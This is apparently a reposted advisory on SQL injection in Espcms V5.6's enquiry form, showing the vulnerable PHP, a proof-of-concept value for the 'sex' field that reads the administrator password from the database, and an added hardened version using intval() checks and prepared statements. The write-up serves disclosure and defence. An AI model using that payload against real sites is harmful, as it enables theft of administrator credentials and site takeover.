Source: 自学PHP网   Date: 2015-04-17 10:15
A file in Espcms V5.6.13.04.22 UTF8 (official release) contains an injection vulnerability through which the administrator account and password can be obtained. The affected code is in the file \interface\enquiry.php:

```php
function in_enquirysave() {
    parent::start_pagetemplate();
    $this->fun->formpathver();
    $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
    if ($this->CON['is_enquiry_memclass']) {
        parent::member_purview(0, $this->get_link('enquiry', array(), admin_LNG));
    }
    $cartid = $this->fun->eccode($this->fun->accept('ecisp_enquiry_list', 'C'), 'DECODE', db_pscode);
    $cartid = stripslashes(htmlspecialchars_decode($cartid));
    $uncartid = !empty($cartid) ? unserialize($cartid) : 0;
    $userid = intval($this->fun->accept('userid', 'P'));
    $userid = !empty($userid) ? $userid : 0;
    $linkman = trim($this->fun->accept('linkman', 'P', true, true));
    $email = $this->fun->accept('email', 'P');
    $sex = $this->fun->accept('sex', 'P');
    $sex = empty($sex) ? 0 : $sex;   // taken from POST as-is: no intval(), and unquoted in the SQL below
    // ... (the remaining assignments are not shown on the original page)
    $db_field = 'enquirysn,userid,linkman,sex,country,province,city,district,address,zipcode,tel,fax,mobile,email,content,isclass,addtime,edittime';
    $db_values = "'$enquirysn',$userid,'$linkman',$sex,$country,$province,$city,$district,'$address','$zipcode','$tel','$fax','$mobile','$email','$content',0,$addtime,0";
    $this->db->query('INSERT INTO ' . $db_table . ' (' . $db_field . ') VALUES (' . $db_values . ')');
    // ... (rest of the function not shown on the original page)
```

The $sex variable is never filtered with intval(), and in the SQL built afterwards it is not enclosed in single quotes either, so whatever is posted in the sex field is spliced directly into the INSERT statement. Proof-of-concept value for the sex parameter, as given on the page:
sex=0,0,0,0,0,1,0,13800000000,0,13800000000,(select password from espcms_admin_member limit 1),0,0,1368528987,0)%23
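A hardened version of the same insert, added here as an example and not taken from Espcms: it casts sex to an integer, restricts it to the codes the form offers, and binds every value through a mysqli prepared statement so the query structure is fixed before any data reaches MySQL. It covers only a subset of the columns; $mysqli, $db_table and the 0/1/2 code set are assumptions.

```php
<?php
// Added example, not ESPCMS code. Assumes $mysqli is an open mysqli
// connection and $db_table is the enquiry table name (both assumptions).

// Normalise the "sex" parameter to one of the integer codes the form offers
// (assumed here: 0 = unspecified, 1 = male, 2 = female). intval() stops at
// the first non-numeric character, so any appended SQL is dropped.
function normalize_sex($raw): int {
    $sex = intval($raw);
    return in_array($sex, [0, 1, 2], true) ? $sex : 0;
}

function save_enquiry(mysqli $mysqli, string $db_table, array $post): bool {
    // Identifiers cannot be bound as parameters; restrict the table name
    // to a plain identifier so it can be safely quoted with backticks.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $db_table)) {
        throw new InvalidArgumentException('bad table name');
    }
    $userid  = intval($post['userid'] ?? 0);
    $linkman = trim((string)($post['linkman'] ?? ''));
    $email   = (string)($post['email'] ?? '');
    $sex     = normalize_sex($post['sex'] ?? 0);
    $addtime = time();

    // Placeholders instead of string concatenation: the user-controlled
    // values travel as data, never as part of the statement text.
    $sql = "INSERT INTO `$db_table` (userid, linkman, sex, email, addtime)"
         . " VALUES (?, ?, ?, ?, ?)";
    $stmt = $mysqli->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $mysqli->error);
    }
    $stmt->bind_param('isisi', $userid, $linkman, $sex, $email, $addtime);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// A constructed value shaped like the page's proof of concept: the
// injected tail after the first number never reaches the database.
$probe = '0,0,0,(select 1))#';
var_dump(normalize_sex($probe)); // int(0)
```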